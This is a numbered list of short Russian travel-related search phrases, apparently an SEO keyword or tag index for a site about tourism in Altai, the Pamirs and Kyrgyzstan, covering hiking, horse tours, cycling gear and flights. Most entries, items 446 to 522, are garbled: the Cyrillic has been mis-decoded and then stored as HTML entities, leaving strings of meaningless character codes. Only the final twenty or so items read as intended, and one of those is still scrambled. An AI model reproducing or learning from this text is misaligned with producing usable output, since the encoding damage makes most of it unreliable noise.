  446. &#1056;°&#1056;»&#1057;&#1034;&#1057;&#8218;&#1056;°&#1056;&#1105;&#1057;&#1026; &#1056;&#1106;&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470;
  447. &#1056;°&#1056;»&#1057;&#1034;&#1057;&#8218;&#1056;°&#1056;&#1105;&#1057;&#1026; &#1056;&#1108;&#1056;»&#1057;&#1107;&#1056;±
  448. &#1056;±&#1056;°&#1057;&#1026;&#1056;&#1029;&#1056;°&#1057;&#1107;&#1056;» &#1056;°&#1056;»&#1056;&#1112;&#1056;°&#1057;&#8218;&#1057;&#8249; &#1057;&#8224;&#1056;µ&#1056;&#1029;&#1056;° &#1056;±&#1056;&#1105;&#1056;»&#1056;µ&#1057;&#8218;&#1056;°
  449. &#1056;&#1030;&#1056;µ&#1056;»&#1056;&#1109;&#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169; &#1056;°&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470;
  450. &#1056;&#1030;&#1056;µ&#1056;»&#1056;&#1109;&#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169; &#1056;&#1029;&#1056;° &#1056;&#1110;&#1056;&#1109;&#1057;&#1026;&#1056;&#1029;&#1057;&#8249;&#1056;&#8470; &#1056;°&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470; &#1056;&#1111;&#1056;&#1109;&#1056;&#1111;&#1057;&#1107;&#1057;&#8218;&#1057;&#8225;&#1056;&#1105;&#1056;
  451. &#1056;&#1030;&#1056;µ&#1056;»&#1056;&#1109;&#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;/
  452. &#1056;&#1030;&#1056;µ&#1056;»&#1056;&#1109;&#1057;&#1027;&#1056;&#1105;&#1056;&#1111;&#1056;µ&#1056;&#1169; jamis
  453. &#1056;&#1030;&#1056;µ&#1056;»&#1056;&#1109;&#1057;&#1027;&#1056;&#1105;&#1056;&#1111;&#1056;µ&#1056;&#1169;&#1056;&#1029;&#1056;°&#1057;&#1039; &#1056;&#1108;&#1057;&#1026;&#1057;&#1107;&#1056;&#1110;&#1056;&#1109;&#1057;&#1027;&#1056;&#1030;&#1056;µ&#1057;&#8218;&#1056;&#1108;&#1056;°
  454. &#1056;&#1030;&#1056;µ&#1057;&#8240;&#1056;&#1105; &#1056;&#1111;&#1056;µ&#1057;&#8364;&#1056;&#1105;&#1056;&#8470; &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;
  455. &#1056;&#1110;&#1056;&#1109;&#1057;&#1027;&#1057;&#8218;&#1057;&#1034; BBCode &#1056;&#1030;&#1056;&#1108;&#1056;»&#1057;&#1035;&#1057;&#8225;&#1056;µ&#1056;&#1029;
  456. &#1056;&#1169;&#1056;&#1109;&#1057;&#1026;&#1056;&#1109;&#1056;&#1110;&#1056;° &#1056;&#1029;&#1056;° &#1056;&#1111;&#1056;»&#1056;°&#1057;&#8218;&#1056;&#1109; &#1056;&#1032;&#1056;&#1108;&#1056;&#1109;&#1056;&#1108;
  457. &#1056;&#1169;&#1056;&#1109;&#1057;&#1026;&#1056;&#1109;&#1056;&#1110;&#1056;° &#1056;&#1029;&#1056;° &#1056;&#1111;&#1056;»&#1056;°&#1057;&#8218;&#1056;&#1109; &#1057;&#1107;&#1056;&#1108;&#1056;&#1109;&#1056;&#1108;
  458. &#1056;&#1169;&#1057;&#1026;&#1056;°&#1056;&#1110;
  459. &#1056;·&#1056;°&#1056;&#1112;&#1057;&#8225;&#1056;°&#1056;»&#1056;&#1109;&#1056;&#1030; &#1056;°&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470;
  460. &#1056;&#1105;&#1056;&#1112;&#1056;µ&#1056;&#1029;&#1056;&#1105;&#1056;&#1029;&#1056;&#1029;&#1056;&#1105;&#1056;&#1108;&#1056;&#1105; &#1056;&#1112;&#1056;°&#1057;&#1039;
  461. &#1056;&#1108;&#1056;°&#1056;&#1108; &#1056;&#1111;&#1056;&#1109;&#1057;&#1027;&#1057;&#8218;&#1057;&#1026;&#1056;&#1109;&#1056;&#1105;&#1057;&#8218;&#1057;&#1034; &#1056;&#1105;&#1056;·&#1056;±&#1057;&#1107; &#1056;&#1111;&#1056;&#1109; &#1057;&#1027;&#1057;&#8218;&#1056;&#1109;&#1057;&#1026;&#1056;&#1109;&#1056;&#1029;&#1056;°&#1056;&#1112; &#1057;&#1027;&#1056;&#1030;&#1056;µ
  462. &#1056;&#1108;&#1056;°&#1057;&#1026;&#1056;&#1110;&#1056;µ&#1056;&#1112;&#1057;&#1027;&#1056;&#1108;&#1056;&#1105;&#1056;&#8470; &#1056;&#1111;&#1057;&#1026;&#1056;&#1109;&#1057;&#1026;&#1057;&#8249;&#1056;&#1030;
  463. &#1056;&#1108;&#1056;»&#1057;&#1107;&#1056;± &#1056;&#1030;&#1056;µ&#1056;»&#1056;&#1109;&#1057;&#8218;&#1057;&#1107;&#1057;&#1026;&#1056;&#1105;&#1057;&#1027;&#1057;&#8218;&#1056;&#1109;&#1056;&#1030; &#1056;&#1116;&#1056;&#1109;&#1056;&#1030;&#1056;&#1109;&#1057;&#1027;&#1056;&#1105;&#1056;±&#1056;&#1105;&#1057;&#1026;&#1057;&#1027;&#1056;&#1108;
  464. &#1056;&#1108;&#1056;»&#1057;&#1107;&#1056;± &#1057;&#8218;&#1057;&#1107;&#1057;&#1026;&#1056;&#1105;&#1056;·&#1056;&#1112;&#1056;° &#1056;°&#1056;»&#1057;&#1034;&#1057;&#8218;&#1056;°&#1056;&#1105;&#1057;&#1026;
  465. &#1056;&#1108;&#1056;&#1109;&#1056;&#1029;&#1056;&#1029;&#1057;&#8249;&#1056;µ &#1056;&#8216;&#1056;&#1109;&#1057;&#8218;&#1056;&#1105;&#1056;&#1029;&#1056;&#1108;&#1056;&#1105;
  466. &#1056;&#1108;&#1056;&#1109;&#1056;&#1029;&#1056;&#1029;&#1057;&#8249;&#1056;µ &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;&#1057;&#8249; &#1056;&#1111;&#1056;»&#1056;°&#1057;&#8218;&#1056;&#1109; &#1057;&#1107;&#1056;&#1108;&#1056;&#1109;&#1056;&#1108;
  467. &#1056;&#1108;&#1056;&#1109;&#1056;&#1029;&#1056;&#1029;&#1057;&#8249;&#1056;µ &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;&#1057;&#8249; &#1056;&#1111;&#1056;&#1109; &#1056;°&#1056;»&#1057;&#8218;&#1056;°&#1057;&#1035; &#1056;&#1109;&#1057;&#8218;&#1057;&#8225;&#1056;µ&#1057;&#8218;&#1057;&#8249;
  468. &#1056;&#1108;&#1056;&#1109;&#1056;&#1029;&#1056;&#1029;&#1057;&#8249;&#1056;&#8470; &#1057;&#8218;&#1057;&#1107;&#1057;&#1026;&#1056;&#1105;&#1056;·&#1056;&#1112;
  469. &#1056;&#1108;&#1057;&#1107;&#1056;&#1169;&#1056;°&#1057;&#8218;&#1056;&#1105;&#1056;&#1029;&#1057;&#1027;&#1056;&#1108;&#1056;&#1105;&#1056;&#8470; &#1056;&#1111;&#1056;µ&#1057;&#1026;&#1056;µ&#1056;&#1030;&#1056;°&#1056;»
  470. &#1056;&#1108;&#1057;&#1107;&#1057;&#8364;&#1056;°&#1056;&#1110;&#1056;°&#1057;&#8225;
  471. &#1056;»&#1056;&#1109;&#1056;&#1111;&#1056;&#1029;&#1057;&#1107;&#1056;»&#1056;° &#1057;&#1027;&#1056;&#1111;&#1056;&#1105;&#1057;&#8224;&#1056;°
  472. &#1056;&#1029;&#1056;°&#1056;±&#1056;&#1105;&#1057;&#1026;&#1056;°&#1057;&#1035; &#1056;&#1110;&#1057;&#1026;&#1057;&#1107;&#1056;&#1111;&#1056;&#1111;&#1057;&#1107; &#1056;&#1030; &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169; 2008
  473. &#1056;&#1029;&#1056;°&#1056;»&#1056;&#1109;&#1056;±&#1056;&#1029;&#1057;&#8249;&#1056;&#8470; &#1057;&#8222;&#1056;&#1109;&#1056;&#1029;&#1056;°&#1057;&#1026;&#1056;&#1105;&#1056;&#1108; &#1057;&#1036;&#1056;&#1029;&#1056;µ&#1057;&#1026;&#1056;&#1169;&#1056;¶&#1056;°&#1056;&#8470;&#1056;·&#1056;µ&#1057;&#1026;
  474. &#1056;&#1109;&#1056;±&#1056;&#1109;&#1056;&#1105; &#1056;°&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470;
  475. &#1056;&#1109;&#1056;±&#1056;&#1109;&#1056;&#1105; &#1056;&#1169;&#1056;»&#1057;&#1039; &#1057;&#1026;&#1056;°&#1056;±&#1056;&#1109;&#1057;&#8225;&#1056;µ&#1056;&#1110;&#1056;&#1109; &#1057;&#1027;&#1057;&#8218;&#1056;&#1109;&#1056;»&#1056;°
  476. &#1056;&#1109;&#1056;±&#1056;&#1109;&#1056;&#1105; &#1056;&#1169;&#1056;»&#1057;&#1039; &#1057;&#1026;&#1056;°&#1056;±&#1056;&#1109;&#1057;&#8225;&#1056;µ&#1056;&#1110;&#1056;&#1109; &#1057;&#1027;&#1057;&#8218;&#1056;&#1109;&#1056;»&#1056;° &#1057;&#1027; &#1056;&#1114;&#1056;&#1105;&#1057;&#8364;&#1056;&#1108;&#1056;°&#1056;&#1112;&#1056;&#1105; &#1056;
  477. &#1056;&#1109;&#1056;±&#1056;&#1109;&#1056;&#1105; &#1056;&#1029;&#1056;° &#1057;&#1026;&#1056;°&#1056;±&#1056;&#1109;&#1057;&#8225;&#1056;&#1105;&#1056;&#8470; &#1057;&#1027;&#1057;&#8218;&#1056;&#1109;&#1056;» &#1056;&#1110;&#1056;&#1109;&#1057;&#1026;&#1057;&#8249; &#1056;&#1119;&#1056;°&#1056;&#1112;&#1056;&#1105;&#1057;&#1026;&#1056;°
  478. &#1056;&#1109;&#1056;&#1169;&#1056;µ&#1056;¶&#1056;&#1169;&#1056;° &#1056;&#1169;&#1056;»&#1057;&#1039; &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;&#1056;°
  479. &#1056;&#1109;&#1056;&#1169;&#1056;¶&#1056;µ&#1056;&#1169;&#1056;° &#1056;&#1105; &#1056;&#1109;&#1056;±&#1057;&#1107;&#1056;&#1030;&#1057;&#1034; &#1056;&#1030; &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;&#1056;µ
  480. &#1056;&#1109;&#1056;&#1108;&#1057;&#1107;&#1056;&#1029;&#1057;&#8216;&#1056;&#1030;&#1057;&#1027;&#1056;&#1108;&#1056;&#1105;&#1056;µ &#1056;&#1109;&#1056;·&#1057;&#8216;&#1057;&#1026;&#1056;°
  481. &#1056;&#1109;&#1057;&#8218; &#1056;&#65533;&#1056;&#1029;&#1057;&#1039; &#1056;&#1169;&#1056;&#1109; &#1056;&#1118;&#1057;&#1035;&#1056;&#1029;&#1056;&#1110;&#1057;&#1107;&#1057;&#1026;&#1056;°
  482. &#1056;&#1109;&#1057;&#8218;&#1056;&#1169;&#1057;&#8249;&#1057;&#8230; &#1056;&#1029;&#1056;° &#1056;&#1109;&#1056;&#1108;&#1057;&#1107;&#1056;&#1029;&#1057;&#8216;&#1056;&#1030;&#1057;&#1027;&#1056;&#1108;&#1056;&#1105;&#1057;&#8230; &#1056;&#1109;&#1056;·&#1057;&#8216;&#1057;&#1026;&#1056;°&#1057;&#8230;
  483. &#1056;&#1111;&#1056;µ&#1057;&#1026;&#1056;µ&#1056;&#1030;&#1056;°&#1056;» &#1056;&#1108;&#1056;°&#1057;&#1039;&#1056;&#1029;&#1057;&#8225;&#1056;°
  484. &#1056;&#1111;&#1056;µ&#1057;&#1026;&#1056;µ&#1056;&#1030;&#1056;°&#1056;» &#1057;&#8218;&#1056;µ&#1056;&#1111;&#1056;»&#1057;&#8249;&#1056;&#8470; &#1056;&#1108;&#1056;»&#1057;&#1035;&#1057;&#8225;
  485. &#1056;&#1111;&#1056;µ&#1057;&#1026;&#1056;µ&#1056;&#1111;&#1057;&#1026;&#1056;°&#1056;&#1030;&#1056;° &#1057;&#8225;&#1056;µ&#1057;&#1026;&#1056;µ&#1056;· &#1056;°&#1057;&#1026;&#1056;&#1110;&#1057;&#1107;&#1057;&#8218; &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;
  486. &#1056;&#1111;&#1056;µ&#1057;&#8364;&#1056;&#1105;&#1056;µ &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;&#1057;&#8249; &#1056;&#1029;&#1056;° &#1056;°&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470; &#1056;°&#1056;»&#1057;&#1034;&#1056;&#1112;&#1056;°&#1056;&#1105;&#1057;&#1026;
  487. &#1056;&#1111;&#1056;µ&#1057;&#8364;&#1056;&#1105;&#1056;µ &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;&#1057;&#8249; &#1056;&#1029;&#1056;° &#1056;&#1110;&#1056;&#1109;&#1057;&#1026;&#1056;&#1029;&#1057;&#8249;&#1056;&#8470; &#1056;°&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470;
  488. &#1056;&#1111;&#1056;µ&#1057;&#8364;&#1056;&#1105;&#1056;&#8470; &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169; &#1056;&#1106;&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470;
  489. &#1056;&#1111;&#1056;µ&#1057;&#8364;&#1056;&#1105;&#1056;&#8470; &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169; &#1056;&#1113;&#1056;°&#1057;&#1026;&#1056;°&#1056;&#1110;&#1056;µ&#1056;&#1112;-&#1056;&#1106;&#1057;&#1026;&#1056;&#1110;&#1057;&#1107;&#1057;&#8218;-&#1056;&#1113;&#1056;°&#1057;&#8218;&#1057;&#1107;&#1056;&#1029;&#1057;&#1034;
  490. &#1056;&#1111;&#1056;µ&#1057;&#8364;&#1056;&#1105;&#1056;&#8470; &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169; &#1056;&#1030; &#1056;&#1106;&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470;
  491. &#1056;&#1111;&#1056;&#1109;&#1056;&#1169;&#1056;±&#1056;&#1109;&#1057;&#1026; &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;&#1056;&#1109;&#1056;&#1030; &#1056;&#1029;&#1056;° &#1056;&#1106;&#1056;»&#1057;&#8218;&#1056;°&#1056;µ
  492. &#1056;&#1111;&#1056;&#1109;&#1056;&#1111;&#1057;&#1107;&#1057;&#8218;&#1057;&#8225;&#1056;&#1105;&#1056;&#1108; &#1056;&#1029;&#1056;° &#1056;°&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470;
  493. &#1056;&#1111;&#1056;&#1109;&#1056;&#1111;&#1057;&#1107;&#1057;&#8218;&#1057;&#8225;&#1056;&#1105;&#1056;&#1108;&#1056;&#1105; 2008 &#1056;&#1110;&#1056;&#1109;&#1056;&#1169;&#1056;°&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470;&#1057;&#8230;&#1056;°&#1056;&#1108;&#1056;°&#1057;&#1027;&#1056;&#1105;&#1057;&#1039;
  494. &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169; &#1056;&#1106;&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470; 2008
  495. &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;&#1056;&#1029;&#1057;&#8249;&#1056;µ &#1056;&#1111;&#1056;µ&#1057;&#1027;&#1056;µ&#1056;&#1029;&#1056;&#1108;&#1056;&#1105; &#1057;&#1027; &#1056;°&#1056;&#1108;&#1056;&#1108;&#1056;&#1109;&#1057;&#1026;&#1056;&#1169;&#1056;°&#1056;&#1112;&#1056;&#1105;
  496. &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;&#1056;&#1029;&#1057;&#8249;&#1056;µ &#1056;&#1111;&#1056;µ&#1057;&#1027;&#1056;&#1029;&#1056;&#1105;
  497. &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;&#1056;&#1029;&#1057;&#8249;&#1056;µ &#1057;&#8218;&#1057;&#1107;&#1057;&#1026;&#1056;&#1105;&#1057;&#1027;&#1057;&#8218;&#1056;&#1105;&#1057;&#8225;&#1056;µ&#1057;&#1027;&#1056;&#1108;&#1056;&#1105;&#1056;µ &#1056;&#1111;&#1056;µ&#1057;&#1027;&#1056;&#1029;&#1056;&#1105;
  498. &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;&#1057;&#8249; &#1056;&#1029;&#1056;° &#1056;&#1106;&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470; 2008 &#1056;»&#1056;µ&#1057;&#8218;&#1056;&#1109;
  499. &#1056;&#1111;&#1056;&#1109;&#1057;&#8225;&#1056;µ&#1056;&#1112;&#1057;&#1107; &#1057;&#8218;&#1056;µ&#1056;&#1111;&#1056;»&#1056;&#1109; &#1056;&#1030; &#1056;&#1110;&#1056;&#1109;&#1057;&#1026;&#1056;°&#1057;&#8230;
  500. &#1056;&#1111;&#1057;&#1026;&#1056;&#1105;&#1056;&#1110;&#1056;»&#1056;°&#1057;&#8364;&#1056;°&#1057;&#1035; &#1056;&#1030; &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169; &#1057;&#8230;&#1056;°&#1056;&#1108;&#1056;°&#1057;&#1027;&#1056;&#1105;&#1057;&#1039;
  501. &#1056;&#1111;&#1057;&#1107;&#1057;&#8218;&#1056;µ&#1057;&#8364;&#1056;µ&#1057;&#1027;&#1057;&#8218;&#1056;&#1030;&#1056;&#1105;&#1056;µ &#1056;&#1030; &#1057;&#1107;&#1056;·&#1056;±&#1056;µ&#1056;&#1108;&#1056;&#1105;&#1057;&#1027;&#1057;&#8218;&#1056;°&#1056;&#1029; &#1056;&#1109;&#1057;&#8218;&#1057;&#8225;&#1056;µ&#1057;&#8218;
  502. &#1056;&#1111;&#1057;&#1107;&#1057;&#8218;&#1056;µ&#1057;&#8364;&#1056;µ&#1057;&#1027;&#1057;&#8218;&#1056;&#1030;&#1056;&#1105;&#1056;µ &#1056;&#1029;&#1056;° &#1056;&#1112;&#1056;°&#1057;&#8364;&#1056;&#1105;&#1056;&#1029;&#1056;µ &#1056;&#1105;&#1056;· &#1056;&#1118;&#1056;°&#1057;&#8364;&#1056;&#1108;&#1056;µ&#1056;&#1029;&#1057;&#8218;&#1056;°
  503. &#1057;&#1026;&#1056;°&#1057;&#1027;&#1057;&#1027;&#1057;&#8218;&#1056;&#1109;&#1057;&#1039;&#1056;&#1029;&#1056;&#1105;&#1056;µ &#1056;&#8216;&#1056;°&#1057;&#1026;&#1056;&#1029;&#1056;°&#1057;&#1107;&#1056;»-&#1056;&#8220;&#1056;&#1109;&#1057;&#1026;&#1056;&#1029;&#1056;&#1109;&#1056;&#1106;&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470;&#1057;&#1027;&#1056;&#1108;
  504. &#1057;&#1026;&#1056;µ&#1056;&#1110;&#1056;&#1105;&#1057;&#1027;&#1057;&#8218;&#1057;&#1026;&#1056;°&#1057;&#8224;&#1056;&#1105;&#1057;&#1039; &#1056;&#1106;&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470;
  505. &#1057;&#1026;&#1057;&#1035;&#1056;&#1108;&#1056;·&#1056;°&#1056;&#1108; &#1056;&#1169;&#1056;»&#1057;&#1039; &#1056;&#1169;&#1056;µ&#1056;&#1030;&#1057;&#1107;&#1057;&#8364;&#1056;&#1108;&#1056;&#1105;
  506. &#1057;&#1027;&#1056;µ&#1056;&#1112;&#1056;&#1105;&#1056;&#1029;&#1057;&#1027;&#1056;&#1108;&#1056;&#1105;&#1056;&#8470; &#1056;&#1111;&#1056;µ&#1057;&#1026;&#1056;µ&#1056;&#1030;&#1056;°&#1056;» &#1056;&#1032;&#1057;&#1027;&#1057;&#8218;&#1057;&#1034;-&#1056;&#1113;&#1056;°&#1056;&#1029;
  507. &#1057;&#1027;&#1056;&#1108;&#1056;°&#1057;&#8225;&#1056;°&#1057;&#8218;&#1057;&#1034; &#1056;±&#1056;µ&#1057;&#1027;&#1056;&#1111;&#1056;»&#1056;°&#1057;&#8218;&#1056;&#1029;&#1056;&#1109; &#1057;&#1026;&#1056;°&#1057;&#1027;&#1057;&#1027;&#1056;&#1108;&#1056;°&#1056;· &#1056;&#1109; &#1056;&#1111;&#1057;&#1107;&#1057;&#8218;&#1056;µ&#1057;&#8364;&#1056;
  508. &#1057;&#1027;&#1057;&#8218;&#1057;&#1026;&#1056;°&#1056;&#1029;&#1056;&#1029;&#1056;&#1105;&#1056;&#1108; &#1057;&#8218;&#1057;&#1107;&#1057;&#1026;&#1056;&#1105;&#1057;&#1027;&#1057;&#8218;&#1056;&#1105;&#1057;&#8225;&#1056;µ&#1057;&#1027;&#1056;&#1108;&#1056;&#1105;&#1056;µ &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;&#1057;&#8249; &#1056;&#1111;&#1056;&#1109;&#1056;&#1105;
  509. &#1057;&#8218;&#1056;°&#1056;&#1112;&#1056;&#1109;&#1056;¶&#1056;&#1029;&#1057;&#1039; &#1056;&#1030; &#1057;&#8225;&#1056;µ&#1057;&#1026;&#1056;&#1029;&#1057;&#1039;&#1056;µ&#1056;&#1030;&#1056;&#1108;&#1056;µ
  510. &#1057;&#8218;&#1057;&#1107;&#1057;&#1026; &#1056;&#1029;&#1056;° &#1056;&#1111;&#1056;»&#1056;°&#1057;&#8218;&#1056;&#1109; &#1056;&#1032;&#1056;&#1108;&#1056;&#1109;&#1056;&#1108;
  511. &#1057;&#8218;&#1057;&#1107;&#1057;&#1026;&#1056;&#1105;&#1056;·&#1056;&#1112;
  512. &#1057;&#8218;&#1057;&#1107;&#1057;&#1026;&#1056;&#1105;&#1056;·&#1056;&#1112; &#1056;&#1105; &#1057;&#1035;&#1056;&#1112;&#1056;&#1109;&#1057;&#1026;
  513. &#1057;&#8218;&#1057;&#1107;&#1057;&#1026;&#1056;&#1105;&#1057;&#1027;&#1057;&#8218;&#1056;&#1105;&#1057;&#8225;&#1056;µ&#1057;&#1027;&#1056;&#1108;&#1056;&#1105;&#1056;&#8470; &#1056;&#1108;&#1056;»&#1057;&#1107;&#1056;± &#1056;&#1106;&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470;&#1057;&#1027;&#1056;&#1108;&#1056;&#1105;&#1056;&#8470; &#1056;°&#1056;»&#1057;&#1034;&#1057;&#8218;
  514. &#1057;&#8218;&#1057;&#1107;&#1057;&#1026;&#1056;&#1105;&#1057;&#1027;&#1057;&#8218;&#1056;&#1105;&#1057;&#8225;&#1056;µ&#1057;&#1027;&#1056;&#1108;&#1056;&#1105;&#1056;&#8470; &#1056;&#1108;&#1056;»&#1057;&#1107;&#1056;± &#1056;&#8216;&#1056;°&#1057;&#1026;&#1056;&#1029;&#1056;°&#1057;&#1107;&#1056;»
  515. &#1057;&#1107;&#1056;·&#1056;±&#1056;µ&#1056;&#1108;&#1056;&#1105;&#1057;&#1027;&#1057;&#8218;&#1056;°&#1056;&#1029; &#1056;&#1110;.&#1056;°&#1056;&#1029;&#1056;&#1110;&#1057;&#1026;&#1056;µ&#1056;&#1029;
  516. &#1057;&#8222;&#1056;&#1109;&#1057;&#1026;&#1057;&#1107;&#1056;&#1112; &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169; &#1056;&#1106;&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470;
  517. &#1057;&#8225;&#1057;&#8218;&#1056;&#1109; &#1056;&#1029;&#1057;&#1107;&#1056;¶&#1056;&#1029;&#1056;&#1109; &#1056;&#1030;&#1056;·&#1057;&#1039;&#1057;&#8218;&#1057;&#1034; &#1056;&#1030; &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;
  518. &#1057;&#8225;&#1057;&#8218;&#1056;&#1109; &#1056;&#1029;&#1057;&#1107;&#1056;¶&#1056;&#1029;&#1056;&#1109; &#1056;&#1030;&#1056;·&#1057;&#1039;&#1057;&#8218;&#1057;&#1034; &#1057;&#1027; &#1057;&#1027;&#1056;&#1109;&#1056;±&#1056;&#1109;&#1056;&#8470; &#1056;&#1030; &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;
  519. &#1057;&#8225;&#1057;&#8218;&#1056;&#1109; &#1056;&#1029;&#1057;&#1107;&#1056;¶&#1056;&#1029;&#1056;&#1109; &#1056;&#1169;&#1056;»&#1057;&#1039; &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;&#1056;&#1109;&#1056;&#1030;
  520. &#1057;&#8225;&#1057;&#8218;&#1056;&#1109; &#1056;&#1029;&#1057;&#1107;&#1056;¶&#1056;&#1029;&#1056;&#1109; &#1057;&#1027; &#1057;&#1027;&#1056;&#1109;&#1056;±&#1056;&#1109;&#1056;&#8470; &#1056;&#1030; &#1057;&#8218;&#1057;&#1107;&#1057;&#1026;. &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;
  521. &#1057;&#1035;&#1056;&#1112;&#1056;&#1109;&#1057;&#1026; &#1057;&#1026;&#1057;&#1035;&#1056;&#1108;&#1056;·&#1056;°&#1056;&#1108;
  522. &#1057;&#1035;&#1056;&#1112;&#1056;&#1109;&#1057;&#1026; &#1057;&#8218;&#1057;&#1107;&#1057;&#1026;&#1056;&#1105;&#1057;&#1027;&#1057;&#8218;&#1056;° &#1057;&#1026;&#1057;&#1035;&#1056;&#1108;&#1056;·&#1056;°&#1056;&#1108;
  523. &#1057;&#1072;&#1081;&#1090; &#1080; &#1092;&#1086;&#1088;&#1091;&#1084; &#1054;&#1082;&#1091;&#1085;&#1077;&#1074;&#1089;&#1082;&#1086;&#1077; &#1086;&#1079;&#1077;&#1088;&#1086;
  524. &#1057;&#1072;&#1088;&#1099;-&#1058;&#1072;&#1096; &#1055;&#1072;&#1084;&#1080;&#1088;
  525. &#1057;&#1082;&#1072;&#1091;&#1090;
  526. &#1058;&#1077;&#1087;&#1083;&#1099;&#1081; &#1082;&#1083;&#1102;&#1095;
  527. &#1058;&#1103;&#1075;&#1091;&#1085; &#1040;&#1083;&#1090;&#1072;&#1081;&#1089;&#1082;&#1080;&#1081; &#1082;&#1088;&#1072;&#1081; - &#1083;&#1099;&#1078;&#1080;
  528. &#1064;&#1077;&#1073;&#1072;&#1083;&#1080;&#1085;&#1086;
  529. &#1070;&#1084;&#1086;&#1088; &#1074; &#1090;&#1091;&#1088;&#1080;&#1079;&#1084;&#1077;
  530. &#1072;&#1083;&#1090;&#1072;&#1081;-&#1087;&#1077;&#1096;&#1077;&#1093;&#1086;&#1076;&#1085;&#1099;&#1077; &#1087;&#1086;&#1093;&#1086;&#1076;&#1099;
  531. &#1073;&#1080;&#1083;&#1077;&#1090; &#1085;&#1072; &#1089;&#1072;&#1084;&#1086;&#1083;&#1077;&#1090; &#1040;&#1083;&#1090;&#1072;&#1081;
  532. &#1074;&#1077;&#1083;&#1086;&#1086;&#1076;&#1077;&#1078;&#1076;&#1072;
  533. &#1074;&#1077;&#1083;&#1086;&#1089;&#1080;&#1087;&#1077;&#1076;&#1085;&#1099;&#1081; &#1087;&#1086;&#1093;&#1086;&#1076;
  534. &#1075;&#1072;&#1079; 66
  535. &#1075;&#1080;&#1076;&#1088;&#1086;&#1084;&#1077;&#1090;&#1094;&#1077;&#1085;&#1090;&#1088;
  536. &#1075;&#1086;&#1088;&#1072; &#1055;&#1072;&#1084;&#1080;&#1088; &#1086;&#1073;&#1086;&#1080; &#1085;&#1072; &#1088;&#1072;&#1073;&#1086;&#1095;&#1080;&#1081; &#1089;&#1090;&#1086;&#1083;
  537. &#1075;&#1086;&#1088;&#1085;&#1099;&#1081; &#1072;&#1083;&#1090;&#1072;&#1081; &#1087;&#1083;&#1072;&#1090;&#1086; &#1091;&#1082;&#1086;&#1082; &#1090;&#1091;&#1088;
  538. &#1076;&#1078;&#1072;&#1079;&#1072;&#1090;&#1086;&#1088;
  539. &#1079;&#1055;&#1058;&#1065; &#1073;&#1052;&#1060;&#1041;&#1057;
  540. &#1080;&#1079;&#1076;&#1077;&#1083;&#1080;&#1103;
  541. &#1082;&#1080;&#1088;&#1075;&#1080;&#1079;&#1080;&#1103; &#1080;&#1089;&#1089;&#1099;&#1082;&#1091;&#1083;&#1100;
  542. &#1082;&#1080;&#1088;&#1075;&#1080;&#1079;&#1080;&#1103; &#1090;&#1077;&#1087;&#1083;&#1099;&#1077; &#1082;&#1083;&#1102;&#1095;&#1080;
  543. &#1082;&#1086;&#1085;&#1099;&#1077; &#1090;&#1091;&#1088;&#1099;
